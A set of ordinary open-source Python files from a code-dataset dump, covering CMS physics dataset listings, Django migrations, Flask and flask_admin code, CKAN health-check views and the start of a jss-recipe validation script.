{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016prompt_RunC//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016prompt_RunC', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016prompt_RunC.root', 'lumi': -1, 'nEvts': 79103372},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016prompt_RunD//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016prompt_RunD', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016prompt_RunD.root', 'lumi': -1, 'nEvts': 124968333},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016prompt_RunF//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016prompt_RunF', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016prompt_RunF.root', 'lumi': -1, 'nEvts': 64744869},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v2/crab_2016prompt_RunG//results/processedLumis.json', 'campaign': 'crab_projects_v2', 'dataset': 'SingleElectron_2016prompt_RunG', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v2/data//TnPTree_SingleElectron_2016prompt_RunG.root', 'lumi': -1, 'nEvts': 138296792},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_DYToLL_madgraph//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8_DYToLL_madgraph', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8_DYToLL_madgraph.root', 'lumi': -1, 'nEvts': 44983870},
{'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOSFs_2016/crab_2016rereco_RunB//results/processedLumis.json', 'campaign': 'crab_projects_RECOSFs_2016', 'dataset': 'SingleElectron_2016rereco_RunB', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOSFs_2016/data//TnPTree_SingleElectron_2016rereco_RunB.root', 'lumi': -1, 'nEvts': 116256313},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v1/crab_2016rereco_RunB//results/processedLumis.json', 'campaign': 'crab_projects_v1', 'dataset': 'SingleElectron_2016rereco_RunB', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v1/data//TnPTree_SingleElectron_2016rereco_RunB.root', 'lumi': 5.364, 'nEvts': 236233675},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v1/crab_2016rereco_RunC//results/processedLumis.json', 'campaign': 'crab_projects_v1', 'dataset': 'SingleElectron_2016rereco_RunC', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v1/data//TnPTree_SingleElectron_2016rereco_RunC.root', 'lumi': 1.810, 'nEvts': 70759545},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v1/crab_2016rereco_RunD//results/processedLumis.json', 'campaign': 'crab_projects_v1', 'dataset': 'SingleElectron_2016rereco_RunD', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v1/data//TnPTree_SingleElectron_2016rereco_RunD.root', 'lumi': 4.241, 'nEvts': 145990095},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v1/crab_2016rereco_RunE//results/processedLumis.json', 'campaign': 'crab_projects_v1', 'dataset': 'SingleElectron_2016rereco_RunE', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v1/data//TnPTree_SingleElectron_2016rereco_RunE.root', 'lumi': 4.054, 'nEvts': 113169852},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v1/crab_2016rereco_RunF//results/processedLumis.json', 'campaign': 'crab_projects_v1', 'dataset': 'SingleElectron_2016rereco_RunF', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v1/data//TnPTree_SingleElectron_2016rereco_RunF.root', 'lumi': 3.085, 'nEvts': 69673589},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_20/src/PhysicsTools/TagAndProbe/crab/crab_projects_v1/crab_2016rereco_RunG//results/processedLumis.json', 'campaign': 'crab_projects_v1', 'dataset': 'SingleElectron_2016rereco_RunG', 'file': '/store/group/phys_egamma/tnp/80X/PhoEleIDs/v1/data//TnPTree_SingleElectron_2016rereco_RunG.root', 'lumi': 7.521, 'nEvts': 151654044},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_elev2/crab_2016_RunB/results/processedLumis.json', 'campaign': 'crab_projects_elev2', 'dataset': 'SingleElectron_2016_RunB', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/elev2/data//TnPTree_SingleElectron_2016_RunB.root', 'lumi': 5.657, 'nEvts': 228669688},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_13_patch1/src/PhysicsTools/TagAndProbe/crab/crab_projects_elev2/crab_2016_RunC//results/processedLumis.json', 'campaign': 'crab_projects_elev2', 'dataset': 'SingleElectron_2016_RunC', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/elev2/data//TnPTree_SingleElectron_2016_RunC.root', 'lumi': 1.761, 'nEvts': 63419101},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_elev2/crab_DYToLL_madgraph/results/processedLumis.json', 'campaign': 'crab_projects_elev2', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/elev2/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8.root', 'lumi': -1, 'nEvts': 36311064},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_elev2/crab_DYToLL_mcAtNLO//processedLumis.json', 'campaign': 'crab_projects_elev2', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-amcatnloFXFX-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/elev2/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-amcatnloFXFX-pythia8.root', 'lumi': -1, 'nEvts': 28696958},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_elev2/crab_WJets_madgraph//results/processedLumis.json', 'campaign': 'crab_projects_elev2', 'dataset': 'WJetsToLNu_TuneCUETP8M1_13TeV-madgraphMLM-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/elev2/mc//TnPTree_WJetsToLNu_TuneCUETP8M1_13TeV-madgraphMLM-pythia8.root', 'lumi': -1, 'nEvts': 24908024},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_phov2/crab_2016_RunB//results/processedLumis.json', 'campaign': 'crab_projects_phov2', 'dataset': 'SingleElectron', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/phov2/data//TnPTree_SingleElectron.root', 'lumi': 5.848, 'nEvts': 236203597},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_phov2/crab_DYToLL_madgraph//results/processedLumis.json', 'campaign': 'crab_projects_phov2', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/phov2/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8.root', 'lumi': -1, 'nEvts': 41253879},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_phov2/crab_DYToLL_mcAtNLO//results/processedLumis.json', 'campaign': 'crab_projects_phov2', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-amcatnloFXFX-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/phov2/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-amcatnloFXFX-pythia8.root', 'lumi': -1, 'nEvts': 28696958},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOv3/crab_2016_RunB//results/processedLumis.json', 'campaign': 'crab_projects_RECOv3', 'dataset': 'SingleElectron_2016_RunB', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOv3/data//TnPTree_SingleElectron_2016_RunB.root', 'lumi': 5.401, 'nEvts': 211415403},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_13_patch1/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOv3/crab_2016_RunC//results/processedLumis.json', 'campaign': 'crab_projects_RECOv3', 'dataset': 'SingleElectron_2016_RunC', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOv3/data//TnPTree_SingleElectron_2016_RunC.root', 'lumi': 1.730, 'nEvts': 62332526},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOv3/crab_DYToLL_madgraph//results/processedLumis.json', 'campaign': 'crab_projects_RECOv3', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOv3/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8.root', 'lumi': -1, 'nEvts': 49877138},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOv3/crab_DYToLL_mcAtNLO//results/processedLumis.json', 'campaign': 'crab_projects_RECOv3', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-amcatnloFXFX-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOv3/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-amcatnloFXFX-pythia8.root', 'lumi': -1, 'nEvts': 28328619}
]
|
[
"[email protected]"
] | |
2c513021cb031fcdb1c6bf1db308b216812e673a
|
ca259dd96261af73d470cbf93714db8219511111
|
/core/apps/storage/migrations/0008_cephstorage.py
|
bf075e00083b8a727ce04d05db9db269fbab0952
|
[
"Apache-2.0"
] |
permissive
|
jedia168/KubeOperator
|
243812a898646b90b38aab56af672b1e218191ff
|
87917cf95f88584ddbc68c50522656bbe42934ec
|
refs/heads/master
| 2021-05-23T00:40:32.206564 | 2020-04-03T10:44:39 | 2020-04-03T10:44:57 | 253,158,258 | 3 | 0 |
Apache-2.0
| 2020-04-05T04:53:20 | 2020-04-05T04:53:20 | null |
UTF-8
|
Python
| false | false | 684 |
py
|
# Generated by Django 2.1.11 on 2019-12-05 04:06
import common.models
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('storage', '0007_auto_20191024_0442'),
]
operations = [
migrations.CreateModel(
name='CephStorage',
fields=[
('id', models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False)),
('name', models.CharField(max_length=255, unique=True)),
('vars', common.models.JsonDictTextField()),
('date_created', models.DateTimeField(auto_now_add=True)),
],
),
]
|
[
"[email protected]"
] | |
df9d8d9d26b3a715fd17b4a1fdbf8b7ea5a0026c
|
477b72708f02ec317a371b9bedfa65d316c48d3c
|
/server-flask/config.py
|
c34f090a816b9c03461f2725f469a3f97a218263
|
[] |
no_license
|
AJenbo/web-api-project
|
bd01ba898f05d84abee3d89d39b57cf31f809fa2
|
ae2aa17f1011fe8ac655b8092cee6a4d34e8cda9
|
refs/heads/master
| 2021-02-11T13:17:23.949374 | 2020-03-02T19:15:35 | 2020-03-02T23:04:53 | 244,494,129 | 1 | 0 | null | 2020-03-02T23:02:47 | 2020-03-02T23:02:47 | null |
UTF-8
|
Python
| false | false | 276 |
py
|
import os
basedir = os.path.abspath(os.path.dirname(__file__))
class Config(object):
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'app.db')
SQLALCHEMY_TRACK_MODIFICATIONS = False
JSON_SORT_KEYS = False
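# Typical wiring (a sketch, not from this repo): the application factory calls
#   app.config.from_object(Config)
# so setting the DATABASE_URL environment variable overrides the SQLite
# default at startup.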
|
[
"[email protected]"
] | |
2d3a95480d633d66c46ef3c824a7c54fbf5b8504
|
3c8742678e10ce40f10da9499ed0aa4a7e5b3792
|
/flask/Lib/site-packages/flask_admin/model/fields.py
|
da38982fa16ddcac6e15042fa18b8373d3843569
|
[] |
no_license
|
SYFT/brushproblem
|
f7f47f194a8bc1110bbfb615861268a2a4f3f84d
|
9818f89e645d324443ee22851f597c0904ef78a3
|
refs/heads/master
| 2021-01-18T21:51:53.393103 | 2016-09-11T04:01:48 | 2016-09-11T04:01:48 | 55,394,355 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,381 |
py
|
import itertools
from wtforms.validators import ValidationError
from wtforms.fields import FieldList, FormField, SelectFieldBase
try:
from wtforms.fields import _unset_value as unset_value
except ImportError:
from wtforms.utils import unset_value
from flask_admin._compat import iteritems
from .widgets import (InlineFieldListWidget, InlineFormWidget,
AjaxSelect2Widget, XEditableWidget)
class InlineFieldList(FieldList):
widget = InlineFieldListWidget()
def __init__(self, *args, **kwargs):
super(InlineFieldList, self).__init__(*args, **kwargs)
def __call__(self, **kwargs):
# Create template
meta = getattr(self, 'meta', None)
if meta:
template = self.unbound_field.bind(form=None, name='', _meta=meta)
else:
template = self.unbound_field.bind(form=None, name='')
# Small hack to remove separator from FormField
if isinstance(template, FormField):
template.separator = ''
template.process(None)
return self.widget(self,
template=template,
check=self.display_row_controls,
**kwargs)
def display_row_controls(self, field):
return True
def process(self, formdata, data=unset_value):
res = super(InlineFieldList, self).process(formdata, data)
# Postprocess - contribute flag
if formdata:
for f in self.entries:
key = 'del-%s' % f.id
f._should_delete = key in formdata
return res
def validate(self, form, extra_validators=tuple()):
"""
Validate this FieldList.
Note that FieldList validation differs from normal field validation in
that FieldList validates all its enclosed fields first before running any
of its own validators.
"""
self.errors = []
# Run validators on all entries within
for subfield in self.entries:
if not self.should_delete(subfield) and not subfield.validate(form):
self.errors.append(subfield.errors)
chain = itertools.chain(self.validators, extra_validators)
self._run_validation_chain(form, chain)
return len(self.errors) == 0
def should_delete(self, field):
return getattr(field, '_should_delete', False)
def populate_obj(self, obj, name):
values = getattr(obj, name, None)
try:
ivalues = iter(values)
except TypeError:
ivalues = iter([])
candidates = itertools.chain(ivalues, itertools.repeat(None))
_fake = type(str('_fake'), (object, ), {})
output = []
for field, data in zip(self.entries, candidates):
if not self.should_delete(field):
fake_obj = _fake()
fake_obj.data = data
field.populate_obj(fake_obj, 'data')
output.append(fake_obj.data)
setattr(obj, name, output)
class InlineFormField(FormField):
"""
Inline version of the ``FormField`` widget.
"""
widget = InlineFormWidget()
class InlineModelFormField(FormField):
"""
Customized ``FormField``.
Excludes model primary key from the `populate_obj` and
handles `should_delete` flag.
"""
widget = InlineFormWidget()
def __init__(self, form_class, pk, form_opts=None, **kwargs):
super(InlineModelFormField, self).__init__(form_class, **kwargs)
self._pk = pk
self.form_opts = form_opts
def get_pk(self):
return getattr(self.form, self._pk).data
def populate_obj(self, obj, name):
for name, field in iteritems(self.form._fields):
if name != self._pk:
field.populate_obj(obj, name)
class ListEditableFieldList(FieldList):
"""
Modified FieldList to allow for alphanumeric primary keys.
Used in the editable list view.
"""
widget = XEditableWidget()
def __init__(self, *args, **kwargs):
super(ListEditableFieldList, self).__init__(*args, **kwargs)
# min_entries = 1 is required for the widget to determine the type
self.min_entries = 1
def _extract_indices(self, prefix, formdata):
offset = len(prefix) + 1
for name in formdata:
# selects only relevant field (not CSRF, other fields, etc)
if name.startswith(prefix):
# exclude offset (prefix-), remaining text is the index
yield name[offset:]
def _add_entry(self, formdata=None, data=unset_value, index=None):
assert not self.max_entries or len(self.entries) < self.max_entries, \
'You cannot have more than max_entries entries in this FieldList'
if index is None:
index = self.last_index + 1
self.last_index = index
# '%s-%s' instead of '%s-%d' to allow alphanumeric
name = '%s-%s' % (self.short_name, index)
id = '%s-%s' % (self.id, index)
# support both wtforms 1 and 2
meta = getattr(self, 'meta', None)
if meta:
field = self.unbound_field.bind(
form=None, name=name, prefix=self._prefix, id=id, _meta=meta
)
else:
field = self.unbound_field.bind(
form=None, name=name, prefix=self._prefix, id=id
)
field.process(formdata, data)
self.entries.append(field)
return field
def populate_obj(self, obj, name):
# return data from first item, instead of a list of items
setattr(obj, name, self.data.pop())
class AjaxSelectField(SelectFieldBase):
"""
Ajax Model Select Field
"""
widget = AjaxSelect2Widget()
separator = ','
def __init__(self, loader, label=None, validators=None, allow_blank=False, blank_text=u'', **kwargs):
super(AjaxSelectField, self).__init__(label, validators, **kwargs)
self.loader = loader
self.allow_blank = allow_blank
self.blank_text = blank_text
def _get_data(self):
if self._formdata:
model = self.loader.get_one(self._formdata)
if model is not None:
self._set_data(model)
return self._data
def _set_data(self, data):
self._data = data
self._formdata = None
data = property(_get_data, _set_data)
def _format_item(self, item):
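        # NOTE: the 'item' parameter is unused here; the field formats its own
        # current value via the loader.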
value = self.loader.format(self.data)
return (value[0], value[1], True)
def process_formdata(self, valuelist):
if valuelist:
if self.allow_blank and valuelist[0] == u'__None':
self.data = None
else:
self._data = None
self._formdata = valuelist[0]
def pre_validate(self, form):
if not self.allow_blank and self.data is None:
raise ValidationError(self.gettext(u'Not a valid choice'))
class AjaxSelectMultipleField(AjaxSelectField):
"""
Ajax-enabled model multi-select field.
"""
widget = AjaxSelect2Widget(multiple=True)
def __init__(self, loader, label=None, validators=None, default=None, **kwargs):
if default is None:
default = []
super(AjaxSelectMultipleField, self).__init__(loader, label, validators, default=default, **kwargs)
self._invalid_formdata = False
def _get_data(self):
formdata = self._formdata
if formdata:
data = []
# TODO: Optimize?
for item in formdata:
model = self.loader.get_one(item) if item else None
if model:
data.append(model)
else:
self._invalid_formdata = True
self._set_data(data)
return self._data
def _set_data(self, data):
self._data = data
self._formdata = None
data = property(_get_data, _set_data)
def process_formdata(self, valuelist):
self._formdata = set()
for field in valuelist:
for n in field.split(self.separator):
self._formdata.add(n)
def pre_validate(self, form):
if self._invalid_formdata:
raise ValidationError(self.gettext(u'Not a valid choice'))
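# Rough usage sketch (assumptions: SQLAlchemy backend, a ModelView subclass):
# these fields are normally created by flask-admin itself when a view declares
# ajax references, e.g.
#
#   class UserView(ModelView):
#       form_ajax_refs = {'manager': {'fields': ('name', 'email')}}
#
# which binds an AjaxSelectField backed by a QueryAjaxModelLoader.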
|
[
"[email protected]"
] | |
b46fa81c4d5e37b46a911e6053109b9b90a22674
|
9ccdadf53de7768ea10add415cbfcd76438178e4
|
/apps/sushi/migrations/0036_credentials_intermediate_report_types.py
|
51df8aafa473ce662dedadbdb135d81d599d3c53
|
[
"MIT"
] |
permissive
|
techlib/celus
|
80e587b3238acf26007f654a38cbdeab558de39b
|
3b70d8d627b66b8181f3aaba572929a1daeca106
|
refs/heads/master
| 2023-07-08T10:42:12.252165 | 2023-04-12T13:02:19 | 2023-07-03T10:25:33 | 186,565,967 | 10 | 4 |
MIT
| 2023-02-15T19:53:48 | 2019-05-14T07:14:23 |
Python
|
UTF-8
|
Python
| false | false | 2,453 |
py
|
# Generated by Django 2.2.15 on 2020-10-01 10:59
from django.db import migrations, models
def active_counter_reports_to_counter_reports(apps, schema_editor):
CounterReportsToCredentials = apps.get_model('sushi', 'CounterReportsToCredentials')
SushiCredentials = apps.get_model('sushi', 'SushiCredentials')
for credentials in SushiCredentials.objects.all():
for counter_report in credentials.active_counter_reports.all():
CounterReportsToCredentials.objects.create(
credentials=credentials, counter_report=counter_report
)
def counter_reports_to_active_counter_reports(apps, schema_editor):
CounterReportsToCredentials = apps.get_model('sushi', 'CounterReportsToCredentials')
for cr2c in CounterReportsToCredentials.objects.all():
cr2c.credentials.active_counter_reports.add(cr2c.counter_report)
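# The two functions above are the forward and reverse steps for the RunPython
# operation below, keeping this data migration reversible.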
class Migration(migrations.Migration):
dependencies = [('sushi', '0035_sushifetchattempt_http_status_code')]
operations = [
migrations.CreateModel(
name='CounterReportsToCredentials',
fields=[
(
'id',
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name='ID'
),
),
(
'credentials',
models.ForeignKey(
on_delete=models.deletion.CASCADE, to='sushi.SushiCredentials'
),
),
(
'counter_report',
models.ForeignKey(
on_delete=models.deletion.CASCADE, to='sushi.CounterReportType'
),
),
],
options={'unique_together': {('credentials', 'counter_report')}},
),
migrations.AddField(
model_name='sushicredentials',
name='counter_reports',
field=models.ManyToManyField(
through='sushi.CounterReportsToCredentials',
to='sushi.CounterReportType',
related_name='sushicredentials_set',
),
),
migrations.RunPython(
            active_counter_reports_to_counter_reports, counter_reports_to_active_counter_reports
),
migrations.RemoveField(model_name='sushicredentials', name='active_counter_reports'),
]
|
[
"[email protected]"
] | |
50f8904f9744ae5e5e841a4571e1af382fd9b1e9
|
c07f45a57aee12a227ac5efa48a785981b74e608
|
/ckanext/ckanext-apicatalog/ckanext/apicatalog/views/__init__.py
|
20adf432d9d9df71246a074f9cbe87af007926e4
|
[
"AGPL-3.0-only",
"MIT"
] |
permissive
|
vrk-kpa/api-catalog
|
44d465d3c9c12c41ef281f2073349777fdbdf9bf
|
a4dc0d12cd5d8886a2b46f62efe124fe5d26e799
|
refs/heads/master
| 2023-08-22T05:22:09.609871 | 2023-06-19T11:05:57 | 2023-06-19T11:05:57 | 42,986,648 | 19 | 9 |
MIT
| 2023-08-23T07:06:35 | 2015-09-23T07:54:38 |
HTML
|
UTF-8
|
Python
| false | false | 1,140 |
py
|
from flask import Blueprint, Response
from ckan.plugins.toolkit import render, c
from ckanext.apicatalog.helpers import get_announcements
import ckanext.apicatalog.health as health
import logging
log = logging.getLogger(__name__)
def get_blueprints():
return [announcements_bp, health_bp]
# Announcements
def announcements():
c.announcement_list = get_announcements(50)
return render(u'announcements/index.html')
announcements_bp = Blueprint("announcements", __name__)
announcements_bp.add_url_rule(u'/announcements', view_func=announcements)
# Health
def health_check():
try:
health.heartbeat()
except health.HealthError as e:
return Response(e.message, status=503)
return Response('OK')
def health_xroad_catalog_heartbeat():
try:
health.xroad_catalog_heartbeat()
return Response('OK')
except health.HealthError as e:
return Response(e.message, status=503)
health_bp = Blueprint('health', __name__)
health_bp.add_url_rule(u'/health', view_func=health_check)
health_bp.add_url_rule(u'/xroad_catalog_heartbeat', view_func=health_xroad_catalog_heartbeat)
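# Quick check (illustrative): `curl -i https://<host>/health` returns 200 OK
# when the heartbeat succeeds and 503 with the error message otherwise.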
|
[
"[email protected]"
] | |
3f3081f32d5f4e05e8080904f17d349273eb67bb
|
2fd5ce9b3fb4f7cc545e3d42181ef89af7e11c05
|
/validate_recipes.py
|
36500a60114163f8feebf0884bc8737597bea0f4
|
[] |
no_license
|
AllWorkAndNoPlay/jss-recipes
|
a9b4d3bde4c1bab41e2e5932a26cd52c5971b8d2
|
bd62d5a2ba585d4df5e3526c69aa6572cc8191ff
|
refs/heads/master
| 2023-06-24T21:04:10.046947 | 2023-06-09T17:29:05 | 2023-06-09T17:29:05 | 52,827,593 | 0 | 1 | null | 2017-11-28T00:17:48 | 2016-02-29T21:53:21 |
Python
|
UTF-8
|
Python
| false | false | 28,612 |
py
|
#!/usr/bin/python
# Copyright (C) 2014-2015 Shea G Craig
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""validate_recipes.py
usage: validate_recipes.py [-h] [-v] recipe [recipe ...]
Test recipes for compliance with the jss-recipe style guide.
positional arguments:
recipe Path to a recipe to validate, or to a folder, to recursively
test all contained recipes.
optional arguments:
-h, --help show this help message and exit
-v, --verbose Display results of all tests.
"""
import argparse
import os
import subprocess
import sys
# pylint: disable=no-name-in-module
from Foundation import (NSData,
NSPropertyListSerialization,
NSPropertyListMutableContainersAndLeaves,
NSPropertyListXMLFormat_v1_0)
# pylint: enable=no-name-in-module
__version__ = "1.0.0"
REQUIRED_ARGUMENTS = (
"self_service_description",
"category",
"policy_template",
"self_service_icon",
"policy_category")
OPTIONAL_ARGUMENTS = (
"jss_inventory_name",
"os_requirements")
PROHIBITED_ARGUMENTS = (
"site_name",
"site_id")
VALID_CATEGORIES = (
"Computer Science",
"Digital Media",
"Games",
"Management",
"Print and Scan",
"Productivity",
"Science and Math",
"Utility")
ALLOWED_EXTENSION_ATTRIBUTES = (
"CFBundleVersionExtensionAttribute.xml"
)
class Error(Exception):
"""Module base exception."""
pass
class PlistParseError(Error):
"""Error parsing a plist file."""
pass
class Plist(dict):
"""Abbreviated plist representation (as a dict)."""
def __init__(self, filename=None):
"""Init a Plist, optionally from parsing an existing file.
Args:
filename: String path to a plist file.
"""
if filename:
dict.__init__(self, self.read_file(filename))
else:
dict.__init__(self)
self.new_plist()
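            # NOTE: new_plist() is not defined in this abbreviated class, so
            # constructing a Plist without a filename would raise AttributeError.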
self.filename = os.path.abspath(filename)
def read_file(self, path):
"""Replace internal XML dict with data from plist at path.
Args:
path: String path to a plist file.
Raises:
PlistParseError: Error in reading plist file.
"""
# pylint: disable=unused-variable
info, pformat, error = (
NSPropertyListSerialization.propertyListWithData_options_format_error_(
NSData.dataWithContentsOfFile_(os.path.expanduser(path)),
NSPropertyListMutableContainersAndLeaves,
None,
None
))
# pylint: enable=unused-variable
if info is None:
if error is None:
error = "Invalid plist file."
raise PlistParseError("Can't read %s: %s" % (path, error))
return info
class Results(object):
"""Collects test results and manages their output."""
def __init__(self):
self.results = []
def add_result(self, result):
self.results.append(result)
def report(self, verbose=False):
if verbose or not all((result[0] for result in self.results)):
for result in self.results:
if verbose or not result[0]:
self._print_result(result)
else:
print "OK"
def report_all(self):
self.report(verbose=True)
def _print_result(self, line):
print "Test: %s Result: %s" % (line[1], line[0])
def get_argument_parser():
"""Build and return argparser for this app."""
parser = argparse.ArgumentParser(description="Test recipes for compliance "
"with the jss-recipe style guide.")
parser.add_argument("recipe", nargs="+", help="Path to a recipe to "
"validate, or to a folder, to recursively test all "
"contained recipes.")
parser.add_argument("-v", "--verbose", help="Display results of all "
"tests.", action="store_true")
return parser
def get_recipes(recipes):
"""Build a list of recipes from filename or dirname.
Args:
recipes: A string filename or path to a directory. Directories
will be recursively searched for files ending with
'.jss.recipe'.
Returns:
List of recipe files.
"""
result = []
if os.path.isfile(recipes):
result.append(recipes)
elif os.path.isdir(recipes):
for root, dirs, files in os.walk(recipes):
for filename in files:
if filename.endswith(".jss.recipe"):
result.append(os.path.join(root, filename))
return result
def validate_recipe(recipe_path, verbose=False):
"""Test a recipe for compliance, printing progress.
Args:
recipe_path: String path to recipe file.
"""
tests = (
test_filename_prefix,
test_filename_suffix,
test_recipe_parsing,
test_is_in_subfolder,
test_folder_contents_have_common_prefix,
test_no_restricted_files_in_folder,
test_parent_recipe,
test_identifier,
test_single_processor,
test_name_prod_name,
test_argument_values,
test_no_prohibited_arguments,
test_input_section,
test_category_value,
test_policy_category_value,
test_policy_template_value,
test_icon_name,
test_group_name,
test_group_template,
test_groups_argument,
test_extension_attributes,
